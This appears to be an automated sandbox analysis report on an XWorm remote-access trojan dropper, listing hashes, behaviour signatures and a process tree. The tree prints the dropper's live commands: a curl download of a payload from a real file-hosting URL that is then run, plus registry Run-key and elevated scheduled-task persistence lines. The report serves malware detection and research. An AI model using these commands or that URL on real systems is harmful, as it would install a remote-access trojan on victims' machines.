Analysis
-
max time kernel
22s -
max time network
26s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 22:07
Static task
static1
Behavioral task
behavioral1
Sample
XWormContent.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
XWormContent.exe
Resource
win10v2004-20230220-en
General
-
Target
XWormContent.exe
-
Size
10KB
-
MD5
7d4e7449b76c34210100ea88c163c7fb
-
SHA1
ef679b47eb42f162355e8772ceb25712dc7ec75e
-
SHA256
4fc4ae98d231e2bf0b8d4ad5463d9d4f673c1d5d63dc98838cf14a61d64ce6e6
-
SHA512
d0ef46b3e5622160e9f6ce5cac8f2b14a10bad8e2c1f91a7e1d9713fd6ed844cf74817ca050e1a2d95ee9cd24ec01c67b6e279acddc95449553effbb8354ec1e
-
SSDEEP
192:qLH2ANdaLix1upSiP/VunlYJLLLTuzTVQLFjb5cqfM:qLH2ydaLiO3hPLTucTf
Malware Config
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
XWormContent.exeXWormPanel.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation XWormContent.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation XWormPanel.exe -
Drops startup file 2 IoCs
Processes:
XWormPanel.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWormPanel.lnk XWormPanel.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XWormPanel.lnk XWormPanel.exe -
Executes dropped EXE 1 IoCs
Processes:
XWormPanel.exepid process 3764 XWormPanel.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
XWormPanel.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XWormPanel = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWormPanel.exe" XWormPanel.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\XWormContent.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\XWormContent.exe" reg.exe -
Drops file in Windows directory 6 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\system.ini cmd.exe File created C:\Windows\XWormContent.exe cmd.exe File opened for modification C:\Windows\XWormContent.exe cmd.exe File created C:\Windows\MicrosoftTeams.exe cmd.exe File opened for modification C:\Windows\MicrosoftTeams.exe cmd.exe File opened for modification C:\Windows\win.ini cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4796 timeout.exe 1716 timeout.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
XWormPanel.exepid process 3764 XWormPanel.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
XWormPanel.exedescription pid process Token: SeDebugPrivilege 3764 XWormPanel.exe Token: SeDebugPrivilege 3764 XWormPanel.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
XWormPanel.exepid process 3764 XWormPanel.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
XWormContent.execmd.exeXWormPanel.execmd.exedescription pid process target process PID 3084 wrote to memory of 3224 3084 XWormContent.exe cmd.exe PID 3084 wrote to memory of 3224 3084 XWormContent.exe cmd.exe PID 3224 wrote to memory of 228 3224 cmd.exe curl.exe PID 3224 wrote to memory of 228 3224 cmd.exe curl.exe PID 3224 wrote to memory of 4796 3224 cmd.exe timeout.exe PID 3224 wrote to memory of 4796 3224 cmd.exe timeout.exe PID 3224 wrote to memory of 3764 3224 cmd.exe XWormPanel.exe PID 3224 wrote to memory of 3764 3224 cmd.exe XWormPanel.exe PID 3224 wrote to memory of 2980 3224 cmd.exe reg.exe PID 3224 wrote to memory of 2980 3224 cmd.exe reg.exe PID 3224 wrote to memory of 1092 3224 cmd.exe reg.exe PID 3224 wrote to memory of 1092 3224 cmd.exe reg.exe PID 3764 wrote to memory of 1676 3764 XWormPanel.exe schtasks.exe PID 3764 wrote to memory of 1676 3764 XWormPanel.exe schtasks.exe PID 3764 wrote to memory of 2976 3764 XWormPanel.exe schtasks.exe PID 3764 wrote to memory of 2976 3764 XWormPanel.exe schtasks.exe PID 3764 wrote to memory of 3052 3764 XWormPanel.exe cmd.exe PID 3764 wrote to memory of 3052 3764 XWormPanel.exe cmd.exe PID 3052 wrote to memory of 1716 3052 cmd.exe timeout.exe PID 3052 wrote to memory of 1716 3052 cmd.exe timeout.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XWormContent.exe"C:\Users\Admin\AppData\Local\Temp\XWormContent.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\system32\curl.execurl https://download1497.mediafire.com/av4hta6mkbagq9q63EQcCM1ZDZ0MJb3pOMqTati_JxDbj6616K7H9HKcefCbImq3V6MPY3E5pcdmBsEqSj4uScyyKg/ex02u2k9g7cros3/XClient.exe --output XWormPanel.exe3⤵PID:228
-
-
C:\Windows\system32\timeout.exetimeout -t 33⤵
- Delays execution with timeout.exe
PID:4796
-
-
C:\Users\Admin\AppData\Local\Temp\XWormPanel.exeXWormPanel.exe3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XWormPanel" /tr "C:\Users\Admin\AppData\Local\Temp\XWormPanel.exe"4⤵
- Creates scheduled task(s)
PID:1676
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "XWormPanel"4⤵PID:2976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1F7E.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:1716
-
-
-
-
C:\Windows\system32\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\XWormContent.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:2980
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\XWormContent.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:1092
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
156KB
MD5ed44dc5ec5d2f4f29288cc873d7b6e5e
SHA163f471a8a2f5d21c6cc717ff4df5963fe0b426be
SHA2564060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393
SHA5125aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3
-
Filesize
156KB
MD5ed44dc5ec5d2f4f29288cc873d7b6e5e
SHA163f471a8a2f5d21c6cc717ff4df5963fe0b426be
SHA2564060e66fbf7ff0ba0514d76d7e89e7e79f75b381d8145eb1fad15da55a2a9393
SHA5125aa192bfa71a94915e50ecdb40d59452b9c44bafd019b4d0632455a53034df6a28dd1bef663b0ad20889a60f65165d3ea317d1be3230c0d36d59377126a9d2a3
-
Filesize
1KB
MD59ed2e107d38ab102bfe7614cfd24e829
SHA19541263008adf001fa4c3a0236f627223380d509
SHA256b7583f69e19e71f24a2820d9decb63402084072889114ccab8fc98b3d16bc598
SHA51231ab6308ba8840d2bc8667f45cec80090f595501df7851beba8584ed4556e505ddd3550cc83cdaeac38f6889904814ea155a7f779552e1c53a20885a0aefb6d2
-
Filesize
162B
MD5e6232656acc695403b429221c7e33dbb
SHA121a0bd725c5a0ab3936faad490b4671b01b4bb40
SHA256ce0bf8ee1db154d086e0faf911c8b86404ffcfdada528cc0f8a6701555f09eb0
SHA512c707fa683509236cdb097470d72e78658992400c6b16719d18f17de78dc857c8337f839aefb1be263a04e6c44409524053cefb92bcf094447ef0bbc825001f0a
-
Filesize
1KB
MD59ed2e107d38ab102bfe7614cfd24e829
SHA19541263008adf001fa4c3a0236f627223380d509
SHA256b7583f69e19e71f24a2820d9decb63402084072889114ccab8fc98b3d16bc598
SHA51231ab6308ba8840d2bc8667f45cec80090f595501df7851beba8584ed4556e505ddd3550cc83cdaeac38f6889904814ea155a7f779552e1c53a20885a0aefb6d2